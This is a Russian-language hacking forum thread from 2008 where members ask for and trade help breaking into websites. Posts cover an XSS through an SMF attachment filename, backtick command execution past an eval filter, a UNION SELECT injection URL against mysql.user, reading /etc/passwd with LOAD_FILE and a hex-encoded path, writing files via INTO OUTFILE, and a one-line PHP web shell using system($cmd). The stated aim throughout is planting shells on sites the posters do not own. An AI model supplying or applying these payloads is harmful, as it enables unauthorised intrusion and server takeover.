Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    В теме Уязвимости SMF (во втором сообщении)
    XSS
    Отсутствует фильтрация atachment filename

    -------------------------
    Получение web shell'a
    нужно создать сообщение и прикрепить файл с именем "name<img src=...."

    и загружается .js скрипт

    -------
    Этот скрипт изменять надо или шел появится сразу как я напишу сообщение ?
     
  2. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    есть такая конструкция в скрипте
    PHP:
    eval(stripslashes($_GET['var']));
    проблема: при запросе фильтруется использование сразу двух скобок, " и \
    каким метод получиться залить шелл, если вообще получится?
     
  3. none222

    none222 Guest

    Reputations:
    0
    стрипслэш не фильтрует ковычки `
    а если сделать такой запрос:

    echo с такими ковычками, то получится тоже самое что и system()

    пример:
    ещё пример:
    ===

    2geforse

    шелл загрузится если админ попадёт на страницу с правильно сформатированным запросом, если я прально понял о чём ты
     
    #3203 none222, 7 Sep 2008
    Last edited by a moderator: 7 Sep 2008
    1 person likes this.
  4. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    o3,14um
    ясно, спасибо
    буду тестить на локалхосте = )
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    echo с такими ковычками, то получится тоже самое что и system()

    вернее это то же самое что shell_exec() ;)
     
  6. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    как узнать сайт хостится на виндовом или линуксовом сервере?
     
  7. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    по заголовку ответа web-сервера
    по сервисам на других портах
    в крайнем случае nmap может помочь
     
    1 person likes this.
  8. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    есть форум vBulletin Version 3.6.3, если ввести forum.site.ru/install/, то вылезает ошибка 500 Internal Server Error
    ------
    ввожу forum.site.ru/installllllll/, вылезает 404 Not Found
    ----------------------------
    тоесть папка install существует ?
     
  9. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2geforse Ты таки прав она есть ;) попробуй указать сразу путь к файлу установки forum.site.ru/install/install.php
     
  10. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    Не кто случаем не подскажет где можно прочитать про методы реализации атак на Повреждение памяти апапча ?
     
  11. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    :d wasm.ru
     
  13. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    угу понял спс ;)
     
  14. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть:
    1)root-права
    2)c://www/www/index.php (знаю путь)
    3)ну естественно File_priv=Y
    Как?.LOAD_FILE (можно посмотреть конфиги ,но не робит ,)но что-то не получаеться
    Или как узнать префикс? (там самописный сайт,локалка) =\
     
    #3214 DDoSька, 8 Sep 2008
    Last edited: 8 Sep 2008
    1 person likes this.
  15. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    http://forum.antichat.ru/thread80306-%F8%E5%EB%EB+%F7%E5%F0%E5%E7+sql.html
     
    2 people like this.
  16. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    http://10.49.165.241/joke/index.php?sbcat_id=-34+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user--

    вот... как залить шелл?
    Сменя +8.
     
  17. _Dread_

    _Dread_ New Member

    Joined:
    21 Jun 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Уязвимость ли это? Как "Это" можно применить?

    Fatal error: Uncaught exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (vceos)' in /usr/local/www/***.by_new/library/Zend/Controller/Dispatcher/Standard.php:249 Stack trace: #0 /usr/local/www/***.by_new/library/Zend/Controller/Front.php(914): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http)) #1 /usr/local/www/***.by_new/htdocs/index.php(81): Zend_Controller_Front->dispatch() #2 {main} thrown in /usr/local/www/***.by_new/library/Zend/Controller/Dispatcher/Standard.php on line 249
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    DDoSька Если речь идёт о заливке через инъекцию, то необходимо, что-бы ковычки не фильтровались. Если ты не можешь прочитать файл так:

    LOAD_FILE('/etc/passwd')

    А можешь так :

    LOAD_FILE(0x2f6574632f706173737764)

    то скорее всего magic_quotes_gpc = on,
    и через INTO OUTFILE залить не получится.

    PS Для любителей докопаться: Я видел что винда, /etc/passwd для примера :)
     
    #3218 Kakoytoxaker, 8 Sep 2008
    Last edited: 8 Sep 2008
  19. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Фишка в том,что отклюбчен удаленный инклуд,
    Warning: include() [function.include]: URL file-access is disabled in the server configuration
    оцтой =\
    Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз))
    дайте самый маленький шелл))
     
    1 person likes this.
  20. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    DDoSька
    <?php system($cmd) ?>
     
    1 person likes this.
Thread Status:
Not open for further replies.